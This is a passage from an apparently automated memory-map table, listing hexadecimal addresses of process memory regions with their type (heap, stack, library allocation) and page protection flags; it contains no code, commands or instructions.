page read and write
|
||
207DE389000
|
heap
|
page read and write
|
||
207E0143000
|
heap
|
page read and write
|
||
D95000
|
heap
|
page read and write
|
||
9CA8A78000
|
stack
|
page read and write
|
||
207DC730000
|
trusted library allocation
|
page read and write
|
||
247BDC04000
|
heap
|
page read and write
|
||
2E11000
|
trusted library allocation
|
page read and write
|
||
7FF848B14000
|
trusted library allocation
|
page read and write
|
||
7FF848B2D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848BD6000
|
trusted library allocation
|
page read and write
|
||
14631290000
|
trusted library section
|
page readonly
|
||
F7EADFB000
|
stack
|
page read and write
|
||
207DC5E0000
|
trusted library allocation
|
page read and write
|
||
7FF848CB2000
|
trusted library allocation
|
page read and write
|
||
201C4F9B000
|
heap
|
page read and write
|
||
207D5E20000
|
trusted library section
|
page readonly
|
||
201BCDED000
|
trusted library allocation
|
page read and write
|
||
1C972557000
|
heap
|
page read and write
|
||
1DA63390000
|
trusted library allocation
|
page read and write
|
||
1463584F000
|
heap
|
page read and write
|
||
146356F4000
|
trusted library allocation
|
page read and write
|
||
1D99E89F000
|
heap
|
page read and write
|
||
1D99E888000
|
heap
|
page read and write
|
||
2002439A000
|
heap
|
page read and write
|
||
1AC8CB84000
|
heap
|
page read and write
|
||
1C97255B000
|
heap
|
page read and write
|
||
53D9000
|
trusted library allocation
|
page read and write
|
||
9CA8AF9000
|
stack
|
page read and write
|
||
4F453FD000
|
stack
|
page read and write
|
||
1D463B50000
|
heap
|
page read and write
|
||
900000
|
trusted library allocation
|
page read and write
|
||
20026E89000
|
trusted library allocation
|
page read and write
|
||
207DC540000
|
trusted library allocation
|
page read and write
|
||
1B2EF000
|
stack
|
page read and write
|
||
21EF9FE000
|
stack
|
page read and write
|
||
207D0DA1000
|
heap
|
page read and write
|
||
F7ECDFC000
|
stack
|
page read and write
|
||
1AC8E3F0000
|
heap
|
page execute and read and write
|
||
207DDD00000
|
heap
|
page read and write
|
||
207DCFB4000
|
heap
|
page read and write
|
||
22234681000
|
heap
|
page read and write
|
||
7FF848B23000
|
trusted library allocation
|
page read and write
|
||
1C97255B000
|
heap
|
page read and write
|
||
1C6EB000
|
stack
|
page read and write
|
||
515A000
|
trusted library allocation
|
page read and write
|
||
207D5E50000
|
trusted library section
|
page readonly
|
||
1C2E0000
|
trusted library allocation
|
page read and write
|
||
F7EBDF5000
|
stack
|
page read and write
|
||
5B6F28E000
|
stack
|
page read and write
|
||
14635A50000
|
remote allocation
|
page read and write
|
||
7FF848CC6000
|
trusted library allocation
|
page read and write
|
||
247BF458000
|
trusted library allocation
|
page read and write
|
||
207DEEE4000
|
heap
|
page read and write
|
||
7FF848CD2000
|
trusted library allocation
|
page read and write
|
||
1ACA6D40000
|
heap
|
page execute and read and write
|
||
7FF848BB0000
|
trusted library allocation
|
page read and write
|
||
11BF000
|
stack
|
page read and write
|
||
207D313B000
|
heap
|
page read and write
|
||
537E000
|
trusted library allocation
|
page read and write
|
||
207E0243000
|
heap
|
page read and write
|
||
1D99F041000
|
heap
|
page read and write
|
||
C9A000
|
heap
|
page read and write
|
||
1D466946000
|
trusted library allocation
|
page read and write
|
||
207D0C78000
|
heap
|
page read and write
|
||
2003E2CC000
|
heap
|
page read and write
|
||
247CF3B1000
|
trusted library allocation
|
page read and write
|
||
2E1F000
|
trusted library allocation
|
page read and write
|
||
7FF848B30000
|
trusted library allocation
|
page read and write
|
||
FDD000
|
heap
|
page read and write
|
||
7FF848E79000
|
trusted library allocation
|
page read and write
|
||
C4BF5FE000
|
stack
|
page read and write
|
||
C80000
|
heap
|
page read and write
|
||
9CA98C9000
|
stack
|
page read and write
|
||
53D1000
|
trusted library allocation
|
page read and write
|
||
207DC680000
|
trusted library allocation
|
page read and write
|
||
1D99EFBC000
|
heap
|
page read and write
|
||
1D99E8A9000
|
heap
|
page read and write
|
||
1D99E82A000
|
heap
|
page read and write
|
||
22234689000
|
heap
|
page read and write
|
||
1D463DF0000
|
trusted library allocation
|
page read and write
|
||
22238010000
|
trusted library allocation
|
page read and write
|
||
1C3F4000
|
heap
|
page read and write
|
||
1AC8E681000
|
trusted library allocation
|
page read and write
|
||
20026E81000
|
trusted library allocation
|
page read and write
|
||
1AC8E6BC000
|
trusted library allocation
|
page read and write
|
||
1D463CEF000
|
heap
|
page read and write
|
||
207DD022000
|
trusted library allocation
|
page read and write
|
||
BBE000
|
heap
|
page read and write
|
||
2BF9CE20000
|
heap
|
page read and write
|
||
207DE34B000
|
heap
|
page read and write
|
||
207DC6F0000
|
trusted library allocation
|
page read and write
|
||
2EF837E000
|
unkown
|
page readonly
|
||
7FF848B30000
|
trusted library allocation
|
page read and write
|
||
F7E9CF9000
|
stack
|
page read and write
|
||
5375000
|
trusted library allocation
|
page read and write
|
||
207DC35C000
|
trusted library allocation
|
page read and write
|
||
1DA7D47B000
|
heap
|
page read and write
|
||
14635630000
|
trusted library allocation
|
page read and write
|
||
F7EB0FE000
|
stack
|
page read and write
|
||
207E0473000
|
heap
|
page read and write
|
||
7FF848CE0000
|
trusted library allocation
|
page execute and read and write
|
||
1D99EFCD000
|
heap
|
page read and write
|
||
1D99E9E3000
|
heap
|
page read and write
|
||
7FF848CB0000
|
trusted library allocation
|
page read and write
|
||
207DE3CE000
|
heap
|
page read and write
|
||
1DA7D0B1000
|
heap
|
page read and write
|
||
207DCF20000
|
heap
|
page read and write
|
||
DE0000
|
heap
|
page read and write
|
||
5379000
|
trusted library allocation
|
page read and write
|
||
9CA8B7B000
|
stack
|
page read and write
|
||
1E9E20BA000
|
heap
|
page read and write
|
||
7DF423731000
|
trusted library allocation
|
page execute read
|
||
1D99E991000
|
heap
|
page read and write
|
||
4F450FE000
|
stack
|
page read and write
|
||
20024300000
|
heap
|
page read and write
|
||
1D99EA58000
|
heap
|
page read and write
|
||
1D99EA26000
|
heap
|
page read and write
|
||
1AC8E551000
|
trusted library allocation
|
page read and write
|
||
7FF848B2B000
|
trusted library allocation
|
page read and write
|
||
5484000
|
trusted library allocation
|
page read and write
|
||
207E0184000
|
heap
|
page read and write
|
||
B10000
|
trusted library allocation
|
page read and write
|
||
7FF848DC0000
|
trusted library allocation
|
page read and write
|
||
7FF848DB0000
|
trusted library allocation
|
page read and write
|
||
7FF848B8C000
|
trusted library allocation
|
page execute and read and write
|
||
201AB039000
|
heap
|
page read and write
|
||
1AC8C8F0000
|
heap
|
page read and write
|
||
2EF8BFE000
|
stack
|
page read and write
|
||
207D0C9D000
|
heap
|
page read and write
|
||
2003622C000
|
trusted library allocation
|
page read and write
|
||
207E0144000
|
heap
|
page read and write
|
||
1E9E2078000
|
heap
|
page read and write
|
||
207DCE13000
|
heap
|
page read and write
|
||
1D99EA85000
|
heap
|
page read and write
|
||
D079913000
|
stack
|
page read and write
|
||
1E9E4231000
|
heap
|
page read and write
|
||
2A2F000
|
stack
|
page read and write
|
||
BAB60FE000
|
stack
|
page read and write
|
||
1C9725AA000
|
heap
|
page read and write
|
||
207DEF8E000
|
heap
|
page read and write
|
||
7FF848C10000
|
trusted library allocation
|
page execute and read and write
|
||
14630273000
|
heap
|
page read and write
|
||
1D99E9C2000
|
heap
|
page read and write
|
||
207D5D1F000
|
heap
|
page read and write
|
||
146311A0000
|
trusted library allocation
|
page read and write
|
||
1D99F002000
|
heap
|
page read and write
|
||
146356B0000
|
trusted library allocation
|
page read and write
|
||
B00000
|
heap
|
page read and write
|
||
1D99F072000
|
heap
|
page read and write
|
||
1DA64C9B000
|
trusted library allocation
|
page read and write
|
||
1BDC5000
|
stack
|
page read and write
|
||
1D99E991000
|
heap
|
page read and write
|
||
10BE000
|
stack
|
page read and write
|
||
1D99EA16000
|
heap
|
page read and write
|
||
1C97252B000
|
heap
|
page read and write
|
||
1DA63109000
|
heap
|
page read and write
|
||
201ACB73000
|
trusted library allocation
|
page read and write
|
||
207D0D48000
|
heap
|
page read and write
|
||
7FF848B6C000
|
trusted library allocation
|
page execute and read and write
|
||
207DE133000
|
heap
|
page read and write
|
||
12DB1000
|
trusted library allocation
|
page read and write
|
||
201ADB30000
|
trusted library allocation
|
page read and write
|
||
1AC8E563000
|
trusted library allocation
|
page read and write
|
||
207DCC30000
|
trusted library allocation
|
page read and write
|
||
7FF848B33000
|
trusted library allocation
|
page execute and read and write
|
||
207DE217000
|
heap
|
page read and write
|
||
7FF848D40000
|
trusted library allocation
|
page read and write
|
||
247CF3BD000
|
trusted library allocation
|
page read and write
|
||
146356E0000
|
trusted library allocation
|
page read and write
|
||
1D99E7ED000
|
heap
|
page read and write
|
||
1D99E9B1000
|
heap
|
page read and write
|
||
1D99EF9A000
|
heap
|
page read and write
|
||
7FF848F20000
|
trusted library allocation
|
page read and write
|
||
E5A000
|
heap
|
page read and write
|
||
207DCDF0000
|
unkown
|
page readonly
|
||
2003620E000
|
trusted library allocation
|
page read and write
|
||
7FF848B7C000
|
trusted library allocation
|
page execute and read and write
|
||
1D99E895000
|
heap
|
page read and write
|
||
210D3A40000
|
heap
|
page read and write
|
||
207DEFC6000
|
heap
|
page read and write
|
||
1D99F041000
|
heap
|
page read and write
|
||
1E9E20BA000
|
heap
|
page read and write
|
||
7FF848C92000
|
trusted library allocation
|
page read and write
|
||
207DCC00000
|
trusted library allocation
|
page read and write
|
||
1DA74F15000
|
trusted library allocation
|
page read and write
|
||
22236490000
|
heap
|
page read and write
|
||
247BF3B1000
|
trusted library allocation
|
page read and write
|
||
1D99EF88000
|
heap
|
page read and write
|
||
207DD456000
|
heap
|
page read and write
|
||
1CCEC000
|
stack
|
page read and write
|
||
1DA7D4A3000
|
heap
|
page read and write
|
||
207D5E61000
|
trusted library allocation
|
page read and write
|
||
7FF848B34000
|
trusted library allocation
|
page read and write
|
||
207DC630000
|
trusted library allocation
|
page read and write
|
||
207DE574000
|
unkown
|
page execute read
|
||
146302FF000
|
heap
|
page read and write
|
||
7FF848E20000
|
trusted library allocation
|
page read and write
|
||
201C5366000
|
heap
|
page read and write
|
||
2BF9CE95000
|
heap
|
page read and write
|
||
2003621C000
|
trusted library allocation
|
page read and write
|
||
207DE339000
|
heap
|
page read and write
|
||
7FF848D10000
|
trusted library allocation
|
page read and write
|
||
210D3C29000
|
heap
|
page read and write
|
||
2002778C000
|
trusted library allocation
|
page read and write
|
||
C70000
|
heap
|
page read and write
|
||
207DCFFD000
|
heap
|
page read and write
|
||
1E9E211A000
|
heap
|
page read and write
|
||
222345FB000
|
heap
|
page read and write
|
||
1E9E211E000
|
heap
|
page read and write
|
||
12DB8000
|
trusted library allocation
|
page read and write
|
||
2EF7F7E000
|
unkown
|
page readonly
|
||
750000
|
unkown
|
page readonly
|
||
207DD8F0000
|
trusted library allocation
|
page read and write
|
||
207DC690000
|
trusted library allocation
|
page read and write
|
||
7FF848BC6000
|
trusted library allocation
|
page read and write
|
||
1E9E42B3000
|
heap
|
page read and write
|
||
F7EC9FD000
|
stack
|
page read and write
|
||
5B6E43E000
|
stack
|
page read and write
|
||
53DD000
|
trusted library allocation
|
page read and write
|
||
20025CA0000
|
heap
|
page execute and read and write
|
||
FB0000
|
heap
|
page read and write
|
||
207DE78A000
|
heap
|
page read and write
|
||
12BF000
|
stack
|
page read and write
|
||
52D5000
|
trusted library allocation
|
page read and write
|
||
1E9E20AE000
|
heap
|
page read and write
|
||
207DCF23000
|
heap
|
page read and write
|
||
9CA97CD000
|
stack
|
page read and write
|
||
2840000
|
trusted library allocation
|
page read and write
|
||
207DE73C000
|
heap
|
page read and write
|
||
5B6E37D000
|
stack
|
page read and write
|
||
1E9E6391000
|
heap
|
page read and write
|
||
7FF848BE0000
|
trusted library allocation
|
page read and write
|
||
207DE3E1000
|
heap
|
page read and write
|
||
981E5FE000
|
stack
|
page read and write
|
||
1D4671D3000
|
trusted library allocation
|
page read and write
|
||
201AB0E0000
|
trusted library allocation
|
page read and write
|
||
1C97254B000
|
heap
|
page read and write
|
||
9C6F0FF000
|
stack
|
page read and write
|
||
1B88F000
|
stack
|
page read and write
|
||
22234724000
|
heap
|
page read and write
|
||
F7ED7FB000
|
stack
|
page read and write
|
||
7FF848D34000
|
trusted library allocation
|
page read and write
|
||
7FF848D60000
|
trusted library allocation
|
page execute and read and write
|
||
C00000
|
trusted library allocation
|
page read and write
|
||
1E9E211A000
|
heap
|
page read and write
|
||
7FF848F00000
|
trusted library allocation
|
page read and write
|
||
1D465E0D000
|
trusted library allocation
|
page read and write
|
||
1D47DEBD000
|
heap
|
page read and write
|
||
7FF6373D8000
|
unkown
|
page readonly
|
||
7FF848CA0000
|
trusted library allocation
|
page read and write
|
||
20024362000
|
heap
|
page read and write
|
||
2C00000
|
heap
|
page read and write
|
||
2920000
|
heap
|
page read and write
|
||
207DD820000
|
trusted library allocation
|
page read and write
|
||
59609FF000
|
unkown
|
page read and write
|
||
7FF848CE4000
|
trusted library allocation
|
page read and write
|
||
20026E96000
|
trusted library allocation
|
page read and write
|
||
F7ED2FC000
|
stack
|
page read and write
|
||
7FF848F30000
|
trusted library allocation
|
page read and write
|
||
1DA7D392000
|
heap
|
page read and write
|
||
1D99E80E000
|
heap
|
page read and write
|
||
7FF848B4D000
|
trusted library allocation
|
page execute and read and write
|
||
207DC700000
|
trusted library allocation
|
page read and write
|
||
7FF848DC0000
|
trusted library allocation
|
page read and write
|
||
1D99E9D4000
|
heap
|
page read and write
|
||
7FF789E20000
|
unkown
|
page readonly
|
||
1C9742E4000
|
heap
|
page read and write
|
||
7FF848D60000
|
trusted library allocation
|
page read and write
|
||
1B88E000
|
stack
|
page read and write
|
||
222345FB000
|
heap
|
page read and write
|
||
1AC8E8A2000
|
trusted library allocation
|
page read and write
|
||
9DF000
|
heap
|
page read and write
|
||
E80000
|
heap
|
page read and write
|
||
1DA7D43A000
|
heap
|
page read and write
|
||
1E9E211D000
|
heap
|
page read and write
|
||
1D463CC2000
|
heap
|
page read and write
|
||
1D99EFCD000
|
heap
|
page read and write
|
||
7FF848DC0000
|
trusted library allocation
|
page read and write
|
||
12A43000
|
trusted library allocation
|
page read and write
|
||
201C52A8000
|
heap
|
page read and write
|
||
207DE31B000
|
heap
|
page read and write
|
||
1D99E89F000
|
heap
|
page read and write
|
||
207DE1B9000
|
heap
|
page read and write
|
||
1D99EA26000
|
heap
|
page read and write
|
||
531D000
|
trusted library allocation
|
page read and write
|
||
1D99EEFE000
|
heap
|
page read and write
|
||
207DE200000
|
heap
|
page read and write
|
||
207D0C00000
|
heap
|
page read and write
|
||
F7EC1FB000
|
stack
|
page read and write
|
||
1D99EA16000
|
heap
|
page read and write
|
||
1C97254B000
|
heap
|
page read and write
|
||
20026B2B000
|
trusted library allocation
|
page read and write
|
||
207DD8EA000
|
unkown
|
page readonly
|
||
2EF9179000
|
stack
|
page read and write
|
||
20027140000
|
trusted library allocation
|
page read and write
|
||
207DCF0A000
|
heap
|
page read and write
|
||
11E5000
|
heap
|
page read and write
|
||
1E9E20FB000
|
heap
|
page read and write
|
||
7FF848B40000
|
trusted library allocation
|
page read and write
|
||
207D3141000
|
heap
|
page read and write
|
||
207DEE85000
|
heap
|
page read and write
|
||
1DA65FE7000
|
trusted library allocation
|
page read and write
|
||
7FF848BF0000
|
trusted library allocation
|
page execute and read and write
|
||
2BFB7510000
|
heap
|
page read and write
|
||
201C5140000
|
heap
|
page read and write
|
||
2BF9CE66000
|
heap
|
page read and write
|
||
247BF5AB000
|
trusted library allocation
|
page read and write
|
||
1D465760000
|
heap
|
page read and write
|
||
A1B000
|
heap
|
page read and write
|
||
207DD760000
|
trusted library allocation
|
page read and write
|
||
207DEF94000
|
heap
|
page read and write
|
||
207DC33C000
|
trusted library allocation
|
page read and write
|
||
1BB6E000
|
stack
|
page read and write
|
||
1DA66A4A000
|
trusted library allocation
|
page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
2B7F000
|
stack
|
page read and write
|
||
1D475C32000
|
trusted library allocation
|
page read and write
|
||
E20000
|
heap
|
page read and write
|
||
207DE382000
|
heap
|
page read and write
|
||
7FF848B3B000
|
trusted library allocation
|
page execute and read and write
|
||
14630C91000
|
trusted library allocation
|
page read and write
|
||
1B5DF000
|
stack
|
page read and write
|
||
1AFCD000
|
stack
|
page read and write
|
||
207DCFE8000
|
heap
|
page read and write
|
||
22234685000
|
heap
|
page read and write
|
||
7FF848B40000
|
trusted library allocation
|
page read and write
|
||
247BDBF0000
|
heap
|
page read and write
|
||
2EF987A000
|
stack
|
page read and write
|
||
22236496000
|
heap
|
page read and write
|
||
1D99EEA8000
|
heap
|
page read and write
|
||
201AAFEE000
|
heap
|
page read and write
|
||
5D0000
|
heap
|
page read and write
|
||
247BF43D000
|
trusted library allocation
|
page read and write
|
||
FF4000
|
heap
|
page read and write
|
||
1E9E6391000
|
heap
|
page read and write
|
||
207DE30E000
|
heap
|
page read and write
|
||
1D99EA73000
|
heap
|
page read and write
|
||
53D7000
|
trusted library allocation
|
page read and write
|
||
DF0000
|
heap
|
page read and write
|
||
207DD632000
|
unkown
|
page readonly
|
||
12D0000
|
heap
|
page read and write
|
||
C4BF8FE000
|
stack
|
page read and write
|
||
D70000
|
trusted library section
|
page read and write
|
||
538B000
|
trusted library allocation
|
page read and write
|
||
1E9E2122000
|
heap
|
page read and write
|
||
1D99EEB8000
|
heap
|
page read and write
|
||
207DD5CF000
|
heap
|
page read and write
|
||
207DD63C000
|
unkown
|
page readonly
|
||
5B6E1F9000
|
stack
|
page read and write
|
||
207DDC31000
|
heap
|
page read and write
|
||
1D99EA28000
|
heap
|
page read and write
|
||
207E00B3000
|
heap
|
page read and write
|
||
7FF848CF0000
|
trusted library allocation
|
page read and write
|
||
52EA000
|
trusted library allocation
|
page read and write
|
||
7FF789DFD000
|
unkown
|
page write copy
|
||
7FF848B23000
|
trusted library allocation
|
page execute and read and write
|
||
1D99EFF1000
|
heap
|
page read and write
|
||
7FF848CE0000
|
trusted library allocation
|
page execute and read and write
|
||
1D99E895000
|
heap
|
page read and write
|
||
207DE3FE000
|
heap
|
page read and write
|
||
1C9728A0000
|
heap
|
page read and write
|
||
1D99EF20000
|
heap
|
page read and write
|
||
1E9E3D50000
|
heap
|
page read and write
|
||
1DA74C21000
|
trusted library allocation
|
page read and write
|
||
1D99EA7E000
|
heap
|
page read and write
|
||
7FF848B0D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
1D99F050000
|
heap
|
page read and write
|
||
51B4000
|
trusted library allocation
|
page read and write
|
||
7FF848E30000
|
trusted library allocation
|
page read and write
|
||
7FF848BE6000
|
trusted library allocation
|
page execute and read and write
|
||
22234550000
|
heap
|
page read and write
|
||
207DD5F7000
|
heap
|
page read and write
|
||
FF1000
|
heap
|
page read and write
|
||
7FF848F70000
|
trusted library allocation
|
page read and write
|
||
207E0098000
|
heap
|
page read and write
|
||
207E0353000
|
heap
|
page read and write
|
||
F7EC3FE000
|
stack
|
page read and write
|
||
207DDD8C000
|
heap
|
page read and write
|
||
2EF7E7E000
|
stack
|
page read and write
|
||
146300D0000
|
heap
|
page read and write
|
||
BAB53AE000
|
stack
|
page read and write
|
||
26AF000
|
trusted library allocation
|
page read and write
|
||
7FF848B10000
|
trusted library allocation
|
page read and write
|
||
7FF848B00000
|
trusted library allocation
|
page read and write
|
||
207D31C1000
|
heap
|
page read and write
|
||
207DEFC4000
|
heap
|
page read and write
|
||
5243000
|
trusted library allocation
|
page read and write
|
||
52F6000
|
trusted library allocation
|
page read and write
|
||
7FF848E60000
|
trusted library allocation
|
page read and write
|
||
2003E7B8000
|
heap
|
page read and write
|
||
14630302000
|
heap
|
page read and write
|
||
207DD678000
|
unkown
|
page readonly
|
||
1D47DE80000
|
heap
|
page read and write
|
||
4967000
|
trusted library allocation
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
1E9E2115000
|
heap
|
page read and write
|
||
2EF8D7E000
|
unkown
|
page readonly
|
||
207DDC33000
|
heap
|
page read and write
|
||
207DDDD1000
|
heap
|
page read and write
|
||
146310A1000
|
trusted library allocation
|
page read and write
|
||
1B751000
|
heap
|
page read and write
|
||
4F4577E000
|
stack
|
page read and write
|
||
247BF4A1000
|
trusted library allocation
|
page read and write
|
||
1D99EF9A000
|
heap
|
page read and write
|
||
1C972559000
|
heap
|
page read and write
|
||
207DD63A000
|
unkown
|
page read and write
|
||
1E9E5F4A000
|
heap
|
page read and write
|
||
247BDBC0000
|
heap
|
page read and write
|
||
207DCB3D000
|
heap
|
page read and write
|
||
1DA74F1D000
|
trusted library allocation
|
page read and write
|
||
201AB034000
|
heap
|
page read and write
|
||
207DD760000
|
trusted library allocation
|
page read and write
|
||
7FF848B1D000
|
trusted library allocation
|
page execute and read and write
|
||
12698000
|
trusted library allocation
|
page read and write
|
||
D23D17F000
|
stack
|
page read and write
|
||
1AFFC000
|
stack
|
page read and write
|
||
207D5D4A000
|
heap
|
page read and write
|
||
1D99E816000
|
heap
|
page read and write
|
||
207DE37C000
|
heap
|
page read and write
|
||
7FF848CF0000
|
trusted library allocation
|
page execute and read and write
|
||
1DA6306F000
|
heap
|
page read and write
|
||
207E0312000
|
heap
|
page read and write
|
||
1D466B58000
|
trusted library allocation
|
page read and write
|
||
BAB5BFE000
|
stack
|
page read and write
|
||
201AB104000
|
heap
|
page read and write
|
||
BE2000
|
heap
|
page read and write
|
||
207DC640000
|
unkown
|
page readonly
|
||
2EF9F7E000
|
unkown
|
page readonly
|
||
7FF848B40000
|
trusted library allocation
|
page read and write
|
||
207DD445000
|
heap
|
page read and write
|
||
7FF848CB7000
|
trusted library allocation
|
page read and write
|
||
4F447D2000
|
stack
|
page read and write
|
||
207DCF1A000
|
heap
|
page read and write
|
||
D079FF7000
|
stack
|
page read and write
|
||
146356B1000
|
trusted library allocation
|
page read and write
|
||
14631620000
|
trusted library allocation
|
page read and write
|
||
1C9725A8000
|
heap
|
page read and write
|
||
5471000
|
trusted library allocation
|
page read and write
|
||
7FF848B34000
|
trusted library allocation
|
page read and write
|
||
7FF848DD0000
|
trusted library allocation
|
page read and write
|
||
1D99EA58000
|
heap
|
page read and write
|
||
1D99F0FA000
|
heap
|
page read and write
|
||
201ACAB0000
|
heap
|
page execute and read and write
|
||
2EF8CFE000
|
stack
|
page read and write
|
||
B20000
|
heap
|
page read and write
|
||
7FF848BE6000
|
trusted library allocation
|
page execute and read and write
|
||
207DCDF0000
|
trusted library allocation
|
page read and write
|
||
1D99E893000
|
heap
|
page read and write
|
||
1E9E213D000
|
heap
|
page read and write
|
||
1BFE0000
|
heap
|
page read and write
|
||
F30000
|
heap
|
page read and write
|
||
2EF8E7E000
|
unkown
|
page readonly
|
||
207DEF8E000
|
heap
|
page read and write
|
||
7FF848C30000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848D40000
|
trusted library allocation
|
page read and write
|
||
207DD8F0000
|
trusted library allocation
|
page read and write
|
||
14635780000
|
trusted library allocation
|
page read and write
|
||
7FF848B3D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848B7C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E80000
|
trusted library allocation
|
page read and write
|
||
7FF848F1C000
|
trusted library allocation
|
page read and write
|
||
1DA66574000
|
trusted library allocation
|
page read and write
|
||
207E0097000
|
heap
|
page read and write
|
||
207DEF02000
|
heap
|
page read and write
|
||
207DE3F6000
|
heap
|
page read and write
|
||
1C5EF000
|
stack
|
page read and write
|
||
1DA74E78000
|
trusted library allocation
|
page read and write
|
||
1D99F073000
|
heap
|
page read and write
|
||
207DD800000
|
trusted library allocation
|
page read and write
|
||
207DD660000
|
trusted library allocation
|
page read and write
|
||
247BD840000
|
heap
|
page read and write
|
||
207DD664000
|
unkown
|
page write copy
|
||
207DC720000
|
trusted library allocation
|
page read and write
|
||
7FF848B20000
|
trusted library allocation
|
page read and write
|
||
2BFAEB45000
|
trusted library allocation
|
page read and write
|
||
207E0364000
|
heap
|
page read and write
|
||
20025C70000
|
trusted library allocation
|
page read and write
|
||
7FF789DFD000
|
unkown
|
page read and write
|
||
F7EC7FC000
|
stack
|
page read and write
|
||
7FF848B44000
|
trusted library allocation
|
page read and write
|
||
1E9E20FD000
|
heap
|
page read and write
|
||
1C97285A000
|
trusted library allocation
|
page read and write
|
||
146302B0000
|
heap
|
page read and write
|
||
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
204B74C000
|
stack
|
page read and write
|
||
1E9E2040000
|
heap
|
page readonly
|
||
B50000
|
heap
|
page read and write
|
||
201AB100000
|
heap
|
page read and write
|
||
207DE29F000
|
heap
|
page read and write
|
||
7FF848EA0000
|
trusted library allocation
|
page read and write
|
||
207E0500000
|
heap
|
page read and write
|
||
207DEE7D000
|
heap
|
page read and write
|
||
C30000
|
heap
|
page read and write
|
||
201C5383000
|
heap
|
page read and write
|
||
207E0502000
|
heap
|
page read and write
|
||
7FF848DA0000
|
trusted library allocation
|
page read and write
|
||
7FF848CC0000
|
trusted library allocation
|
page read and write
|
||
7FF848CE0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF789E1C000
|
unkown
|
page readonly
|
||
1D99E836000
|
heap
|
page read and write
|
||
204A77D000
|
stack
|
page read and write
|
||
1DA6308F000
|
heap
|
page read and write
|
||
1E9E6495000
|
heap
|
page read and write
|
||
F10000
|
heap
|
page read and write
|
||
1D463E10000
|
heap
|
page read and write
|
||
247BD8DC000
|
heap
|
page read and write
|
||
207DD481000
|
heap
|
page read and write
|
||
207DD8F0000
|
trusted library allocation
|
page read and write
|
||
52D1000
|
trusted library allocation
|
page read and write
|
||
247D7DDE000
|
heap
|
page read and write
|
||
207E048B000
|
heap
|
page read and write
|
||
1D99F074000
|
heap
|
page read and write
|
||
2BFB7360000
|
heap
|
page read and write
|
||
20024445000
|
heap
|
page read and write
|
||
1C3A8000
|
heap
|
page read and write
|
||
1D99E898000
|
heap
|
page read and write
|
||
1D47DFA3000
|
heap
|
page read and write
|
||
1B4E0000
|
heap
|
page read and write
|
||
7FF848CB0000
|
trusted library allocation
|
page read and write
|
||
207DC34C000
|
trusted library allocation
|
page read and write
|
||
D07A2FE000
|
stack
|
page read and write
|
||
1D4759B5000
|
trusted library allocation
|
page read and write
|
||
207DCC80000
|
trusted library allocation
|
page read and write
|
||
1CAE8000
|
stack
|
page read and write
|
||
207DD4E3000
|
heap
|
page read and write
|
||
1D47DD4E000
|
heap
|
page read and write
|
||
FBC000
|
heap
|
page read and write
|
||
1D99E8A9000
|
heap
|
page read and write
|
||
1D475971000
|
trusted library allocation
|
page read and write
|
||
F7E9FFD000
|
stack
|
page read and write
|
||
207DE389000
|
heap
|
page read and write
|
||
7FF848B22000
|
trusted library allocation
|
page read and write
|
||
204A8F9000
|
stack
|
page read and write
|
||
1C445000
|
heap
|
page read and write
|
||
1E9E6350000
|
heap
|
page read and write
|
||
207DE33B000
|
heap
|
page read and write
|
||
1DA63071000
|
heap
|
page read and write
|
||
981E6FE000
|
stack
|
page read and write
|
||
207E0104000
|
heap
|
page read and write
|
||
7FF848F60000
|
trusted library allocation
|
page read and write
|
||
204A183000
|
stack
|
page read and write
|
||
247BF47D000
|
trusted library allocation
|
page read and write
|
||
7FF848CC0000
|
trusted library allocation
|
page read and write
|
||
207D5740000
|
trusted library allocation
|
page read and write
|
||
1E9E63D3000
|
heap
|
page read and write
|
||
7FF848C30000
|
trusted library allocation
|
page execute and read and write
|
||
1AC8E6C0000
|
trusted library allocation
|
page read and write
|
||
1B6CE000
|
stack
|
page read and write
|
||
1E9E6413000
|
heap
|
page read and write
|
||
207D319D000
|
heap
|
page read and write
|
||
1D99E800000
|
heap
|
page read and write
|
||
7FF848E70000
|
trusted library allocation
|
page read and write
|
||
7FF848D20000
|
trusted library allocation
|
page read and write
|
||
1E9E20C4000
|
heap
|
page read and write
|
||
1E9E212A000
|
heap
|
page read and write
|
||
1E9E20BA000
|
heap
|
page read and write
|
||
207DCF7B000
|
heap
|
page read and write
|
||
F7EBDF8000
|
stack
|
page read and write
|
||
207E00C5000
|
heap
|
page read and write
|
||
1D99EEB9000
|
heap
|
page read and write
|
||
5E0000
|
heap
|
page read and write
|
||
207DD8C0000
|
heap
|
page read and write
|
||
14630F40000
|
trusted library allocation
|
page read and write
|
||
1D47DD3E000
|
heap
|
page read and write
|
||
7FF848B8C000
|
trusted library allocation
|
page execute and read and write
|
||
1D475941000
|
trusted library allocation
|
page read and write
|
||
2223466D000
|
heap
|
page read and write
|
||
207DCAD4000
|
heap
|
page read and write
|
||
126A8000
|
trusted library allocation
|
page read and write
|
||
207DD770000
|
trusted library allocation
|
page read and write
|
||
2BF9CD82000
|
unkown
|
page readonly
|
||
247BD912000
|
heap
|
page read and write
|
||
207DE560000
|
trusted library allocation
|
page read and write
|
||
200277B3000
|
trusted library allocation
|
page read and write
|
||
9C6E90A000
|
stack
|
page read and write
|
||
1D463CB0000
|
heap
|
page read and write
|
||
2BF9CEA1000
|
heap
|
page read and write
|
||
1D99EA85000
|
heap
|
page read and write
|
||
9CA86FE000
|
stack
|
page read and write
|
||
52A0000
|
trusted library allocation
|
page read and write
|
||
1DA7D426000
|
heap
|
page read and write
|
||
F80000
|
heap
|
page read and write
|
||
1D99EF53000
|
heap
|
page read and write
|
||
207DCDE0000
|
trusted library allocation
|
page read and write
|
||
CF1000
|
stack
|
page read and write
|
||
5B6E2F7000
|
stack
|
page read and write
|
||
F7E9AF9000
|
stack
|
page read and write
|
||
207D0D11000
|
heap
|
page read and write
|
||
207DDFC2000
|
unkown
|
page readonly
|
||
207DEF42000
|
heap
|
page read and write
|
||
7FF6373FA000
|
unkown
|
page readonly
|
||
14635790000
|
trusted library allocation
|
page read and write
|
||
548C000
|
trusted library allocation
|
page read and write
|
||
207DE368000
|
heap
|
page read and write
|
||
